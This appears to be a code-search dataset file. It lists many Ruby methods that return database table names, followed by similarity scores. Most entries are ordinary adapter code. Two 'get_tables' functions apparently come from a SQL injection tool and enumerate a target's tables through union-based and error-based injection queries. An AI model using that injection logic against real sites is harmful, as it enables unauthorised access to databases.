"def tables\n []\n end",
"def tables\n execute('select table_name from information_schema.tables where table_schema = ?', [schema]).map(&:first)\n end",
"def tables(opts={})\n execute('SHOW TABLES').map{|i| i.values}.reduce(:+).map{|i| i.to_sym}\n end",
"def tables\r\n conn_exec do |driver|\r\n if !@tables\r\n require \"#{File.dirname(__FILE__)}/drivers/#{@opts[:type]}/knjdb_#{@opts[:type]}_tables\" if (!@opts.key?(:require) or @opts[:require])\r\n @tables = Kernel.const_get(\"KnjDB_#{@opts[:type]}\".to_sym).const_get(:Tables).new(\r\n :db => self\r\n )\r\n end\r\n \r\n return @tables\r\n end\r\n end",
"def tables(name = nil)\n @connection.table_names\n end",
"def tables(name = nil, schema = nil, table = nil)\n schema = schema ? \"'#{quote_string(schema)}'\" : 'CURRENT_SCHEMA'\n select_rows(\n \"SELECT table_name \"+\n \"FROM information_schema.tables \"+\n \"WHERE table_type = 'TABLE' \"+\n \" AND table_schema = #{schema} \"+\n (table ? \"AND table_name = '#{quote_string(table)}'\" : \"\"),\n SCHEMA_LOG_NAME\n ).map { |row|\n row[0]\n }\n end",
"def tables_from(db=current_database)\n end",
"def tables\n @tables ||= if @registration[:tables].present?\n @registration[:tables].call(@connection)\n else\n @connection.tables\n end\n end",
"def tables(opts=OPTS, &block)\n tables_or_views('TABLE', opts, &block)\n end",
"def tables\n execute(\"SHOW TABLES FROM #{@opts[:database]}\")\n .map{ |i| i.values }\n .reduce(:+)\n .map{ |i| i.to_sym }\n end",
"def tables(name = nil)\n select_rows(<<-SQL, name).map { |row| row[0] }\nSELECT name\nFROM sysobjects\nWHERE type = 'U'\nSQL\n end",
"def compute_table_list\n if @configuration.download_tables\n # If the list is explicitly set then use that\n tables = @configuration.download_tables.to_set\n else\n # Otherwise guess via the tables actually in the database\n tables = @adapter.guess_tables.to_set\n\n if @configuration.allow_tables\n # Only allow tables tables that we specify\n tables = tables.intersection @configuration.allow_tables\n end\n if @configuration.disallow_tables\n # Remove any tables that we don't want included\n tables = tables.difference @configuration.disallow_tables\n end\n end\n return tables\n end",
"def tables\n db_connection.select_values(\"show tables\")\n end",
"def tables\n sanity_check\n @handle.tables\n end",
"def get_tables\n tables\n end",
"def tables(_name = nil)\n stmt = @connection.tables\n result = stmt.fetch_all || []\n stmt.drop\n\n result.each_with_object([]) do |row, table_names|\n schema_name, table_name, table_type = row[1..3]\n next if respond_to?(:table_filtered?) && table_filtered?(schema_name, table_type)\n table_names << format_case(table_name)\n end\n end",
"def tables(_name = nil)\n stmt = @connection.tables\n result = stmt.fetch_all || []\n stmt.drop\n\n result.each_with_object([]) do |row, table_names|\n schema_name, table_name, table_type = row[1..3]\n next if respond_to?(:table_filtered?) && table_filtered?(schema_name, table_type)\n table_names << format_case(table_name)\n end\n end",
"def tables\n [\n ]\n end",
"def tables()\n tables = []\n @client.query(\"SHOW TABLES;\").each do |table|\n tables.push(table.values[0])\n end\n\n tables\n end",
"def tables\n connection.list_tables.select { |table| !exclude?(table) }\n end",
"def tables\r\n return @engine.tables\r\n end",
"def tables(name = nil)\n if name\n ActiveSupport::Deprecation.warn(<<-MSG.squish)\n Passing arguments to #tables is deprecated without replacement.\n MSG\n end\n\n select_values(\"SELECT tablename FROM pg_tables WHERE schemaname = ANY(current_schemas(false))\", 'SCHEMA')\n end",
"def tables\n self.probe_tables unless @tables\n @tables\n end",
"def tables(name = nil) #:nodoc:\n select_all(\"select decode(table_name,upper(table_name),lower(table_name),table_name) name from all_tables where owner = sys_context('userenv','session_user')\").map {|t| t['name']}\n end",
"def each_table_name\n return enum_for(:each_table_name) unless block_given?\n\n data_dictionary.each_table do |record|\n yield record[\"NAME\"]\n end\n\n nil\n end",
"def table_name\n if qualified? && meta[:qualified].is_a?(Symbol)\n meta[:qualified]\n else\n source.dataset\n end\n end",
"def tables(name = nil, database = nil, like = nil)\n database = database ? quote_table_name(database) : \"DATABASE()\"\n by_name = like ? \"AND table_name LIKE #{quote(like)}\" : \"\"\n\n sql = <<-SQL.squish\n SELECT table_name, table_type\n FROM information_schema.tables\n WHERE table_schema = #{database}\n AND table_type = 'BASE TABLE'\n #{by_name}\n SQL\n\n execute_and_free(sql, 'SCHEMA') do |result|\n rows_from(result).map(&:first)\n end\n end",
"def schema_tables\n @schema_tables ||= %i[\n projects\n amazon_clouds\n data_centers\n jmeter_plans\n load_agents\n target_hosts\n clusters\n execution_cycles\n client_stats\n page_stats\n target_stats\n jtl_files\n ]\n end",
"def list_tables(table=nil)\n q = table ? \"show tables like '#{quote table}'\" : \"show tables\"\n query(q).map(&:first)\n end",
"def tables\n @tables ||= {}.tap do |tables|\n parsed_data['tables'].map do |table|\n parsed_table_rows = parse_choices(table['rows'])\n tables[table['id']] = Table.new(table['name'], table['parameters'], parsed_table_rows)\n end\n end\n end",
"def schema_ds_from(table_name, opts)\n [:information_schema__tables___t]\n end",
"def get_tables(options={})\n return send_message(SkyDB::Message::GetTables.new(options))\n end",
"def tables(name = nil) #:nodoc:\r\n sql = \"EXECUTE PROCEDURE sp_GetTables( NULL, NULL, NULL, 'TABLE' );\"\r\n select(sql, name).map { |row| strip_or_self(row[\"TABLE_NAME\"]) }\r\n end",
"def table_names\n @tables.keys\n end",
"def get_tables\r\n table_names = []\r\n tables = @db.execute <<-SQL\r\n SELECT name FROM sqlite_master\r\n WHERE type='table'\r\n ORDER BY name;\r\n SQL\r\n tables.each do |row| \r\n table_names << row[\"name\"]\r\n end\r\n table_names\r\n end",
"def db_queries_table__samples\n [\n \"table1\",\n \"table2\"\n ]\n end",
"def get_tables\n get_schemas.keys\n end",
"def tables(opts={'start' => nil, 'limit' => nil})\n Cursor.new({'collection' => \"tables\",\n 'start' => opts['start'],\n 'limit' => opts['limit']}.update(@opts)) {|x| Table.new(@opts, x)}\n end",
"def current_schemata\n extension :pg_array\n metadata_dataset.select(Sequel::function(:current_schemas, false).\n cast('varchar[]')).single_value.map(&:to_sym)\n end",
"def list\n Table.with_db do |db|\n return @db\n .execute(\"select name from sqlite_master where type='table' ORDER BY name;\")\n .flatten \n end\n end",
"def show_tables\n execute('select table_name from information_schema.tables where table_schema = ?', [schema])\n end",
"def list_tables\n data.keys\n end",
"def schema_and_table_name\n if qualified_table_name.include? '.'\n schema_name, table_name = qualified_table_name.split('.', 2)\n else\n table_name = qualified_table_name\n schema_name = self.class.default_schema_name\n end\n [schema_name, table_name]\n end",
"def get_table_names\n raise \"No database file selected.\" unless $current_db\n\n $tables = get_data \"select name from sqlite_master\"\n $tables.collect!{|x| x[0] } ## 1.9 hack, but will it run on 1.8 ??\n $tables\nend",
"def table_names\n with_admin { |admin| admin.list_tables.map(&:name_as_string) }\n end",
"def tables\n return nil unless has_connection?\n self.connection.tables\n end",
"def tables\n @connection.tables.select {|row| row.to_s !~ /^system_/i }\n end",
"def base_tables(name = nil)\n # this is untested\n select_values(\"SELECT table_name FROM information_schema.tables\", name)\n end",
"def tables(name = nil)\n query(<<-SQL, 'SCHEMA').map { |row| row[0] }\n SELECT tablename\n FROM pg_tables\n WHERE schemaname = ANY (ARRAY['public'])\n SQL\n end",
"def get_tables\n\t\t@@tables\n\tend",
"def tables_for_sql\n @tables_for_sql ||= RailsRedshiftReplicator.replicable_target_tables.join(\",\")\n end",
"def tables(name = nil) #:nodoc:\n tables = @connection.tables\n tables.reject! { |t| /\\A_SYS_/ === t }\n tables\n end",
"def all\n partitions.group_by { |row| row['table_name'] }.map(&method(:to_tablature_table))\n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth(opts[:dataset])\n\n table = if opts[:schema]\n Sequel.qualify(opts[:schema], table_name)\n else\n Sequel.identifier(table_name)\n end\n\n describe(table, opts).map do |row|\n row[:db_type] = row[:type]\n row[:type] = schema_column_type(row[:db_type])\n row[:default] = nil\n row[:primary_key] = false\n [m.call(row.delete(:name)), row]\n end\n end",
"def table_names\n @table_names ||= entities.map{|entity|entity.model.table_name}.uniq\n end",
"def tablename; datastore['TABLENAME']; end",
"def tables(name = nil)\n query(<<-SQL, name).map { |row| row[0] }\n SELECT table_name\n FROM v_catalog.tables\n WHERE table_schema = 'public'\n SQL\n end",
"def tables\n tables = []\n @a.keys.each{|e| if !e.match(/_base$/) then tables.push(e) end}\n tables\n end",
"def each_table(&block)\n if block_given?\n @tables.each_value(&block)\n self\n else\n @tables.values\n end\n end",
"def tables\n raise 'SevenZip#tables should never be called'\n end",
"def get_tables(params)\n tables = []\n params.each do |param|\n \tp = param.split(\":\")\n \tnext if p.first != \"table\"\n tables << p[1] if p[0] == \"table\"\n end\n raise TypeError, Ajaila::Messager.warning(\"No tables included. Add: \\\"table:SomeTable\\\"\") if tables == []\n return tables\n end",
"def tables(name = nil) #:nodoc:\n tables = @connection.tables\n tables.reject! { |t| /\\A_SYS_/ === t }\n end",
"def schema_parse_tables(opts)\n schemas = {}\n schema_ds(nil, opts).each do |row|\n (schemas[row.delete(:table_name).to_sym] ||= []) << row\n end\n schemas.each do |table, rows|\n schemas[table] = schema_parse_rows(rows)\n end\n schemas\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def table_names\n @table_names ||= ActiveRecord::Base.connection.tables - excluded_table_names\n end",
"def schema_ds_filter(table_name, opts)\n if table_name\n [{:c__table_name=>table_name.to_s}]\n else\n [{:t__table_type=>'BASE TABLE'}]\n end\n end",
"def table_names\n structure_yml.to_a.map { |s| s.first }.select{ |tn| tn != SHARED_COLUMNS }\n end",
"def tables(query)\n SqlAssess::Parsers::Tables.new(query).tables.map do |table|\n if table.key?(:join_type)\n table[:table][:table].remove('`')\n else\n table[:table].remove('`')\n end\n end\n end",
"def table(*query_names, &block)\n each_query(query_names) do |query|\n query.table_settings = block\n end\n end",
"def list_names_of_all_tables\n tables = @stargate.list_tables\n tables.collect { |t| t.name}\n end",
"def table_elements(identifier)\n platform.tables_for(identifier.clone)\n end",
"def named_tables( names )\n @tables.values_at( *names )\n end",
"def probe_tables\n master.probe\n\n @probe_lock.synchronize do\n return unless @tables.nil?\n\n db = standby_slaves.last || active_slaves.last || master\n if db && db.running?\n output \"Probing tables via #{db}\"\n else\n output \"Warning: unable to probe tables\"\n return\n end\n\n @tables = []\n sql = \"SHOW TABLES\"\n db.query_return_array(sql).each do |tbl|\n table_name = tbl.values.first\n @tables << db.detect_table_schema(table_name)\n end\n end\n end",
"def tables()\n return MicrosoftGraph::Drives::Item::Items::Item::Workbook::Tables::TablesRequestBuilder.new(@path_parameters, @request_adapter)\n end",
"def get_myisam_tables(mysql2_client)\n target_schemas = SCHEMA_EXCLUSIONS.map { |x| \"'#{x}'\" }\n schema_list = target_schemas.join(', ')\n query = 'SELECT TABLE_SCHEMA, TABLE_NAME, ENGINE ' \\\n ' FROM INFORMATION_SCHEMA.TABLES ' \\\n ' WHERE ENGINE = \\'MyISAM\\' ' \\\n \" AND TABLE_SCHEMA NOT IN (#{schema_list}) \"\n\n # puts \"SQL: #{query}\"\n results = mysql2_client.query(query)\n tables = []\n results.each do |row|\n tables << \"`#{row['TABLE_SCHEMA']}`.`#{row['TABLE_NAME']}`\"\n end\n tables\nend",
"def get_tables\n if @target_config['CDB_TABLES'].empty?\n if not @target_config['VERSION'].nil?\n if @target_config['VERSION'].scan(/./)[0].to_i < 5\n # MySQL < 5\n print_error(\"MySQL < 5: #{@target_config['VERSION']}\")\n print_error(\"There is no information_schema to query for tables as result.....\")\n if not @target_config['CURRENT_DB'].nil?\n print_error(\"Do you want to try Common Table Names (Y/N)?\")\n answer=gets.chomp\n print_line(\"\")\n if answer.upcase == 'Y' or answer.upcase == 'YES'\n tables = common_tables('CURRENT-DB', \"#{HOME}fuzz/common_tables.lst\")\n if tables.empty?\n print_error(\"OK, returning to menu...\")\n return nil\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n return tables.join(' ')\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n else\n # MySQL >= 5\n if @target_config['CURRENT_DB'].nil?\n print_error(\"Current DB has not yet been discovered!\")\n print_error(\"Try BASIC command if you haven't already!\")\n print_error(\"You can also use DBTABLES command if you know the DB Name....\")\n print_error(\"FUZZ_TABLES can be used as a last resort as well if you know the DB Name...\")\n return nil\n else\n count=0\n tables=[]\n query = 'select count(table_name) from information_schema.tables where table_schema=database()'\n results = union_basic_inject($config['INJECTOR']['MYSQL']['UNION']['VULN_COLUMN'].to_i, query)\n if results.nil?\n query = 'select count(table_name) from information_schema.tables where table_schema=schema()'\n results = union_basic_inject($config['INJECTOR']['MYSQL']['UNION']['VULN_COLUMN'].to_i, query)\n if results.nil?\n query = \"select count(table_name) from information_schema.tables where table_schema=#{@target_config['CURRENT_DB'].mysqlhex}\"\n results = union_basic_inject($config['INJECTOR']['MYSQL']['UNION']['VULN_COLUMN'].to_i, query)\n if results.nil?\n print_error(\"Unable to determine number of tables in current database, sorry....\")\n end\n end\n end\n if not results.nil?\n print_good(\"Fetching #{results} Tables from Current DB\")\n case query\n when /database()/\n dbn='database()'\n when /schema()/\n dbn='schema()'\n when /0x[a-z0-9]{1,}/\n dbn=\"#{@target_config['CURRENT_DB'].mysqlhex}\"\n end\n while not results.nil?\n results = union_basic_inject($config['INJECTOR']['MYSQL']['UNION']['VULN_COLUMN'].to_i, \"select table_name from information_schema.tables where table_schema=#{dbn} limit #{count},1\")\n pad = ' ' * (results.size + 25) unless results == '' or results.nil?\n pad = ' ' * 50 if results.nil?\n print \"\\r(#{count})> #{results}#{pad}\".cyan unless results == ''\n tables << results unless results == ''\n count = count.to_i + 1\n end\n print_line(\"\")\n if tables.empty?\n print_line(\"\")\n print_error(\"Unable to get any tables from the current database!\")\n print_error(\"Lack of privileges? IDK....\")\n print_status(\"Possible Solutions include:\")\n print_caution(\"A) Become HR's best friend by updating the code and sending him a copy\")\n print_caution(\"B) Tweak Settings and try things again\")\n print_caution(\"C) Be a bawz and do it manually\")\n print_line(\"\")\n return nil\n else\t\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n print_good(\"Current DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n return tables.join(' ')\n end\n else\n print_error(\"Do you want to try Common Table Names (Y/N)?\")\n answer=gets.chomp\n print_line(\"\")\n if answer.upcase == 'Y' or answer.upcase == 'YES'\n tables = common_tables('CURRENT-DB', \"#{HOME}fuzz/common_tables.lst\")\n if tables.empty?\n print_error(\"OK, returning to menu...\")\n return nil\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES']\n return tables.join(' ')\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n end\n end\n end\n else\n print_error(\"No version info collected yet!\")\n print_error(\"Try using the BASIC comamnd and then try again....\")\n print_error(\"You could also use the FUZZ TABLES option....\")\n end\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\") unless @target_config['CURRENT_DB'].nil?\n print_good(\"Tables: #{@target_config['CDB_TABLES'].join(', ').sub(/, $/, '')}\")\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n end\n end",
"def tables(key = nil)\n key ||= properties.key1\n response = table_response(key, nil, \"Tables\")\n JSON.parse(response.body)['value'].map{ |t| Table.new(t) }\n end",
"def get_tables\n if @target_config['CDB_TABLES'].empty?\n if not @target_config['VERSION'].nil?\n if @target_config['VERSION'].scan(/./)[0].to_i < 5\n # MySQL < 5\n print_error(\"MySQL < 5: #{@target_config['VERSION']}\")\n print_error(\"There is no information_schema to query for tables as result.....\")\n if not @target_config['CURRENT_DB'].nil?\n print_error(\"Do you want to try Common Table Names (Y/N)?\")\n answer = gets.chomp\n print_line(\"\")\n if answer.upcase == 'Y' or answer.upcase == 'YES'\n tables = common_tables('CURRENT-DB', \"#{HOME}fuzz/common_tables.lst\")\n if tables.empty?\n print_error(\"OK, returning to menu...\")\n return nil\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n return tables.join(' ')\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n else\n # MySQL >= 5\n if @target_config['CURRENT_DB'].nil?\n print_error(\"Current DB has not yet been discovered!\")\n print_error(\"Try BASIC command if you haven't already!\")\n print_error(\"You can also use DBTABLES command if you know the DB Name....\")\n print_error(\"FUZZ_TABLES can be used as a last resort as well if you know the DB Name...\")\n return nil\n else\n count = 0\n tables=[]\n query = 'select count(table_name) from information_schema.tables where table_schema=database()'\n results = error_basic_inject(query)\n if results.nil?\n query = 'select count(table_name) from information_schema.tables where table_schema=schema()'\n results = error_basic_inject(query)\n if results.nil?\n query = \"select count(table_name) from information_schema.tables where table_schema=#{@target_config['CURRENT_DB'].mysqlhex}\"\n results = error_basic_inject(query)\n if results.nil?\n print_error(\"Unable to determine number of tables in current database, sorry....\")\n end\n end\n end\n if not results.nil?\n print_good(\"Fetching #{results} Tables from Current DB\") unless results.nil?\n case query\n when /database()/\n dbn = 'database()'\n when /schema()/\n dbn = 'schema()'\n when /0x[a-z0-9]{1,}/\n dbn = \"#{@target_config['CURRENT_DB'].mysqlhex}\"\n end\n while not results.nil?\n results = error_basic_inject(\"select table_name from information_schema.tables where table_schema=#{dbn} limit #{count},1\")\n pad = ' ' * (results.size + 25) unless results.nil? or results == ''\n pad = ' ' * 50 if results.nil? or results == ''\n\t\tprint \"\\r(#{count})> #{results}#{pad}\".cyan unless results == ''\n\t\ttables << results unless results == ''\n\t\tcount = count.to_i + 1\n end\n print_line(\"\")\n if tables.empty?\n print_line(\"\")\n print_error(\"Unable to get any tables from the current database!\")\n print_error(\"Lack of privileges? IDK....\")\n print_status(\"Possible Solutions include:\")\n print_caution(\"A) Become HR's best friend by updating the code and sending him a copy\")\n print_caution(\"B) Tweak Settings and try things again\")\n print_caution(\"C) Be a bawz and do it manually\")\n print_line(\"\")\n return nil\n else\t\n @target_config['CDB_TABLES'] = tables\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES']\n print_good(\"Current DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n return tables.join(' ')\n end\n else\n print_error(\"Do you want to try Common Table Names (Y/N)?\")\n answer = gets.chomp\n print_line(\"\")\n if answer.upcase == 'Y' or answer.upcase == 'YES'\n tables = common_tables('CURRENT-DB', \"#{HOME}fuzz/common_tables.lst\")\n if tables.empty?\n print_error(\"OK, returning to menu...\")\n return nil\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\")\n print_good(\"Tables: #{tables.join(', ').sub(/, $/, '')}\")\n @target_config['CDB_TABLES'] = tables\n @db_tables[\"#{@error_cdb}\"] = @target_config['CDB_TABLES']\n return tables.join(' ')\n end\n else\n print_error(\"OK, returning to menu...\")\n return nil\n end\n end\n end\n end\n else\n print_error(\"No version info collected yet!\")\n print_error(\"Try using the BASIC comamnd and then try again....\")\n print_error(\"You could also use the FUZZ TABLES option....\")\n end\n else\n print_good(\"DB: #{@target_config['CURRENT_DB']}\") unless @target_config['CURRENT_DB'].nil?\n print_good(\"Tables: #{@target_config['CDB_TABLES'].join(', ').sub(/, $/, '')}\")\n @target_config['DB_TABLES'][\"#{@target_config['CURRENT_DB']}\"] = @target_config['CDB_TABLES'] unless @target_config['CURRENT_DB'].nil?\n @target_config['DB_TABLES']['Current DB'] = @target_config['CDB_TABLES'] if @target_config['CURRENT_DB'].nil?\n end\n end",
"def sqlite3_all_tables\n return @dbh.execute(\"select * from sqlite_master where type='table';\")\n end",
"def get_all_tables\n\t\ttc = new_sub(@discovery['tables']['url'], @discovery['tables']['capability'])\n\t\ttc.listen.map {|x| JSON.parse(x) rescue nil}.compact\n\tend",
"def _dump_tables(opts)\n if opts[:schema]\n _literal_table_sort(tables(opts.merge(:qualify=>true)))\n else\n tables(opts).sort\n end\n end",
"def find_tables_to_process\n return @tables unless @tables.nil?\n temp = ARGV\n temp = list_available_tables if temp.nil? || temp.empty?\n @tables = {}\n temp.each do |t|\n t = t.scan(/[a-z0-9\\-_]/i).join\n debug \"Checking #{t}\"\n # only add tables if they exist AND have an abstract_form column\n begin\n form = RT.custom_query(\"SELECT abstract_form FROM #{t}\", [], true)\n form = Marshal.load(Base64.decode64(form[\"abstract_form\"]))\n valid_fields = form.questions.collect do |q|\n SUPPORTED_TYPES.include?(q.type) ? q.db_column : nil\n end\n valid_fields.compact!\n # HACK HACK HACK! Remove after current eval. FIXME FIXME FIXME\n if valid_fields.include?(\"tutnum\")\n valid_fields.delete(\"tutnum\")\n valid_fields << \"tutor_id\"\n end\n\n @tables[t] = valid_fields.flatten unless valid_fields.empty?\n rescue => e\n debug \"Table #{t} doesn't appear to be valid or doesn’t exist.\"\n debug \"Error message: #{e.message}\"\n end\n end\n @tables\n end",
"def split_qualifiers(table_name)\n schema_utility_dataset.split_qualifiers(table_name)\n end",
"def get_all_data(table)\n return $db.execute('SELECT * FROM ' + table);\n end",
"def query_tables(options = {})\n query = new_query(options)\n query[TableConstants::NEXT_TABLE_NAME] = options[:next_table_token] if options[:next_table_token]\n\n options[:request_location_mode] = Azure::Storage::Common::RequestLocationMode::PRIMARY_OR_SECONDARY\n uri = collection_uri(query, options)\n\n headers = {\n Azure::Storage::Common::HeaderConstants::ACCEPT => Serialization.get_accept_string(options[:accept]),\n }\n\n response = call(:get, uri, nil, headers, options)\n entries = Serialization.table_entries_from_json(response.body) || []\n values = Azure::Storage::Common::Service::EnumerationResults.new(entries)\n values.continuation_token = response.headers[TableConstants::CONTINUATION_NEXT_TABLE_NAME]\n values\n rescue => e\n raise_with_response(e, response)\n end",
"def create(tablename)\n #allow us to pass either a single symbol or an array of symbols.\n if Symbol === tablename\n tablename = [tablename]\n end\n\n tablename.each do |table|\n #standard creation protocol.\n $BS.create table\n\n #here is the reflective magic. Defined below in this list is this thingy.\n $BS.connect {|db| eval \"data_#{table} db\"}\n end\n\n $BS\nend",
"def schema_ds(table_name, opts)\n schema_ds_dataset.from(*schema_ds_from(table_name, opts)) \\\n .select(*schema_ds_select(table_name, opts)) \\\n .join(*schema_ds_join(table_name, opts)) \\\n .filter(*schema_ds_filter(table_name, opts))\n end",
"def blob_tables\n execute('select table_name from information_schema.tables where table_schema = ?', ['blob']).map(&:first)\n end",
"def schema(table_name = nil, opts={})\n table_name = table_name.to_sym if table_name\n if opts[:reload] && @schemas\n if table_name\n @schemas.delete(table_name)\n else\n @schemas = nil\n end\n end\n\n if @schemas\n if table_name\n return @schemas[table_name] if @schemas[table_name]\n else\n return @schemas\n end\n end\n\n if table_name\n @schemas ||= {}\n if respond_to?(:schema_parse_table, true)\n @schemas[table_name] ||= schema_parse_table(table_name, opts)\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n else\n if respond_to?(:schema_parse_tables, true)\n @schemas = schema_parse_tables(opts)\n elsif respond_to?(:schema_parse_table, true) and respond_to?(:tables, true)\n tables.each{|t| schema(t, opts)}\n @schemas\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n end\n end",
"def dataset\n database[table_name]\n end",
"def tables_with_referential_integrity\n schemas_and_tables = select_rows <<-SQL.strip_heredoc\n SELECT s.name, o.name\n FROM sys.foreign_keys i\n INNER JOIN sys.objects o ON i.parent_object_id = o.OBJECT_ID\n INNER JOIN sys.schemas s ON o.schema_id = s.schema_id\n SQL\n schemas_and_tables.map do |schema_table|\n schema, table = schema_table\n \"#{SQLServer::Utils.quoted_raw(schema)}.#{SQLServer::Utils.quoted_raw(table)}\"\n end\n end",
"def table(args={})\n args[:connection_name] = @connection_name unless args.has_key?(:connection_name)\n req(:required => [:table_name, :db_name],\n :args_object => args)\n dbh = Mysqladmin::Exec.new(:connection_name => args[:connection_name])\n dbh.use(args[:db_name])\n dbh.query(:sql => \"SHOW TABLE STATUS LIKE '#{args[:table_name]}'\")\n if dbh.rows > 0\n dbh.fetch_hash do |table_data|\n return {\n :table_name => table_data[\"Name\"],\n :engine => table_data[\"Engine\"].downcase,\n :data_length => table_data[\"Data_length\"].to_i,\n :index_length => table_data[\"Index_length\"].to_i,\n :total_length => (table_data[\"Data_length\"].to_i + table_data[\"Index_length\"].to_i),\n :collation => table_data[\"Collation\"].downcase,\n :rows => table_data[\"Rows\"].to_i,\n :avg_row_length => table_data[\"Avg_row_length\"].to_i,\n :max_data_length => table_data[\"Max_data_length\"].to_i,\n :row_format => table_data[\"Row_format\"].downcase\n }\n end\n end\n \n # :connection_name => The named connection to use for database statistics,\n # :db_name => The database to gather statistics on\n def database(args={})\n args[:connection_name] = @connection_name unless args.has_key?(:connection_name)\n req(:required => [:db_name],\n :args_object => args)\n data = {}\n dbh = Mysqladmin::Exec.new(:connection_name => args[:connection_name])\n dbh.use(args[:db_name])\n dbh.list_tables.each do |table_name|\n data[table_name] = table(:table_name => args[:table_name], :db_name => args[:db_name], :connection_name => args[:connection_name])\n end\n return data\n end\n \n end",
"def table\n Airmodel.client.table base_config[:base_id], base_config[:table_name]\n end",
"def load_tables\n tables = @table_ast.keys\n tables.each {|table|\n columns = Hash.new\n column_names = @table_ast[table].keys\n rows = @dbh.execute(\"SELECT * FROM #{table}\")\n @mem_db_row[table] = rows\n column_names.each {|col|\n col_data = Array.new\n rows.each {|data|\n col_data.push(data[col])\n }\n columns[col] = col_data\n }\n @mem_db_col[table] = columns\n }\n return @mem_db_col, @mem_db_row\n end",
"def all_database_names\n @specs_store.names\n end",
"def schema_and_table(table_name)\n schema_utility_dataset.schema_and_table(table_name)\n end"
] |
[
"0.6650578",
"0.65994585",
"0.6580728",
"0.65064585",
"0.64151305",
"0.64074725",
"0.63925153",
"0.6348351",
"0.6316044",
"0.62666374",
"0.6252346",
"0.6231937",
"0.6230909",
"0.6217725",
"0.6167698",
"0.6167294",
"0.61424625",
"0.6121533",
"0.61198103",
"0.60758275",
"0.60737467",
"0.6058681",
"0.60242254",
"0.6013441",
"0.5990216",
"0.5988396",
"0.5960738",
"0.59241354",
"0.5911711",
"0.5908636",
"0.5865367",
"0.5836293",
"0.5834977",
"0.5833594",
"0.5825647",
"0.582509",
"0.5802654",
"0.57607913",
"0.5729208",
"0.5726156",
"0.570596",
"0.56994045",
"0.5642556",
"0.5637554",
"0.5635532",
"0.5621742",
"0.5611418",
"0.5596214",
"0.55914265",
"0.5575496",
"0.55741274",
"0.5568407",
"0.55625385",
"0.55616635",
"0.5544475",
"0.553489",
"0.5514156",
"0.5503492",
"0.5487825",
"0.5476753",
"0.54645514",
"0.5463986",
"0.54623586",
"0.5456308",
"0.5451666",
"0.5448607",
"0.54124975",
"0.5401025",
"0.53729326",
"0.53678423",
"0.53621763",
"0.5353218",
"0.5351982",
"0.5345993",
"0.53346807",
"0.53141004",
"0.53059256",
"0.5304973",
"0.5284267",
"0.5279987",
"0.5265574",
"0.52537584",
"0.5235786",
"0.5220678",
"0.5217942",
"0.5215813",
"0.5214394",
"0.5213506",
"0.52125305",
"0.5193673",
"0.519228",
"0.51772743",
"0.5173065",
"0.51659846",
"0.5164582",
"0.51635516",
"0.5144852",
"0.5132873",
"0.51286834",
"0.5119439"
] |
0.6096867
|
19
|
Check whether the given type name string/symbol (e.g. :hstore) is supported by the database.
|
def type_supported?(type)
Sequel.synchronize{return @supported_types[type] if @supported_types.has_key?(type)}
supported = from(:pg_type).where(:typtype=>'b', :typname=>type.to_s).count > 0
Sequel.synchronize{return @supported_types[type] = supported}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports?(dbtype)\n (:ctan.eql? dbtype.to_sym)\n end",
"def valid_type?(type)\n !native_database_types[type].nil?\n end",
"def type_exists?(name)\n user_defined_types.key? name.to_s\n end",
"def supports?(type)\n supported.include? type.to_sym\n end",
"def check_type(type)\n %w{galera mysql}.each do |t|\n return true if t == type\n end\n false\n end",
"def kind?(name)\n table[name]&.kind\n end",
"def supported?(name); end",
"def has_type?(type_sym)\n each_term do |term|\n if is?(term, type_sym)\n return true\n end\n end\n \n false\n end",
"def is_strtype?(); @type == GRT_STRTYPE; end",
"def is_strname?(); @type == GRT_STRNAME; end",
"def has_typekit?(name)\n available_typekits.has_key?(name)\n end",
